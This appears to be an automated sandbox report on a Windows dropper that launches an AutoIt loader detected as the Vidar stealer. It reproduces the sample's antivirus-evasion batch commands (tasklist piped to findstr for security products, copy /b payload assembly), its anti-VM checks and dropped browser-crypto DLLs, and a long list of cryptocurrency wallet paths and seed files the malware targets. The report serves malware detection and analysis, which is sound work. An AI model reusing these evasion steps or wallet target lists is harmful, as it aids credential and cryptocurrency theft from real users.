Source: Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CONTENT.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIP

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\ProgramData\HCAEGCBFHJDG\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\ProgramData\HCAEGCBFHJDG\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\ProgramData\HCAEGCBFHJDG\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\ProgramData\HCAEGCBFHJDG\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nss3[1].dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_11-100363

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

API coverage: 4.3 %

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_0040683D FindFirstFileW,FindClose,	0_2_0040683D
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C13
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ED4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_00ED4005
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ED494A GetFileAttributesW,FindFirstFileW,FindClose,	11_2_00ED494A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_00EDC2FF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	11_2_00EDCD9F
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDCD14 FindFirstFileW,FindClose,	11_2_00EDCD14
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_00EDF5D8
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_00EDF735
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00EDFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	11_2_00EDFA36
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00ED3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_00ED3CE2

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00E85D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00E85D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Source: HCAEGCBF.11.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: HCAEGCBF.11.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: HCAEGCBF.11.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: HCAEGCBF.11.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: HCAEGCBF.11.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: HCAEGCBF.11.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: HCAEGCBF.11.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: HCAEGCBF.11.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: HCAEGCBF.11.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: HCAEGCBF.11.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: HCAEGCBF.11.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: HCAEGCBF.11.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2620952300.00000000016B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: HCAEGCBF.11.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: HCAEGCBF.11.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: HCAEGCBF.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: HCAEGCBF.11.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Spice.pif, 0000000B.00000002.2620952300.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW"
Source: HCAEGCBF.11.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: HCAEGCBF.11.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: HCAEGCBF.11.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: HCAEGCBF.11.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: HCAEGCBF.11.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: 0dN59ZIkEM.exe, 00000000.00000002.1451330319.00000000005DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\F
Source: HCAEGCBF.11.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: HCAEGCBF.11.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: Spice.pif, 0000000B.00000002.2621300072.00000000017D4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: HCAEGCBF.11.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: HCAEGCBF.11.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: HCAEGCBF.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: HCAEGCBF.11.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: HCAEGCBF.11.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: HCAEGCBF.11.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: HCAEGCBF.11.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: HCAEGCBF.11.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	API call chain: ExitProcess graph end node	graph_0-3663
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	API call chain: ExitProcess graph end node	graph_11-98166
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	API call chain: ExitProcess graph end node	graph_11-98240

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EE45D5 BlockInput,

11_2_00EE45D5

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00E85240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_00E85240

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EA5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

11_2_00EA5CAC

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EEC6D9 LoadLibraryA,GetProcAddress,

11_2_00EEC6D9

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EC88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

11_2_00EC88CD

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E9A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		11_2_00E9A385
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Code function: 11_2_00E9A354 SetUnhandledExceptionFilter,		11_2_00E9A354

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EC9369 LogonUserW,

11_2_00EC9369

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00E85240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_00E85240

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00ED1AC6 SendInput,keybd_event,

11_2_00ED1AC6

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00ED51E2 mouse_event,

11_2_00ED51E2

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Bag Bag.cmd && Bag.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1151	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "NickelTruckWritersBattery" Mattress	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Mostly + Rap + Robust + Aboriginal 1151\a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif 1151\Spice.pif 1151\a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

11_2_00EC88CD

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00ED4F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

11_2_00ED4F1C

Source: 0dN59ZIkEM.exe, 00000000.00000003.1354277819.0000000002820000.00000004.00000020.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmp, Factor.0.dr, Spice.pif.2.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Spice.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00E9885B cpuid

11_2_00E9885B

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EB0030 GetLocalTime,__swprintf,

11_2_00EB0030

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EB0722 GetUserNameW,

11_2_00EB0722

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

Code function: 11_2_00EA416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

11_2_00EA416A

Source: C:\Users\user\Desktop\0dN59ZIkEM.exe

Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004034F7

Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp, Spice.pif, 0000000B.00000002.2620838284.00000000015DE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Spice.pif

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 11.2.Spice.pif.4810000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.2180401342.000000000481B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2622802244.0000000004811000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2621375005.0000000001820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2180158067.0000000001A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2621300072.00000000017A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2621187844.0000000001751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2180218902.00000000016C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Spice.pif PID: 752, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: Spice.pif, 0000000B.00000002.2621699873.0000000001A3C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger 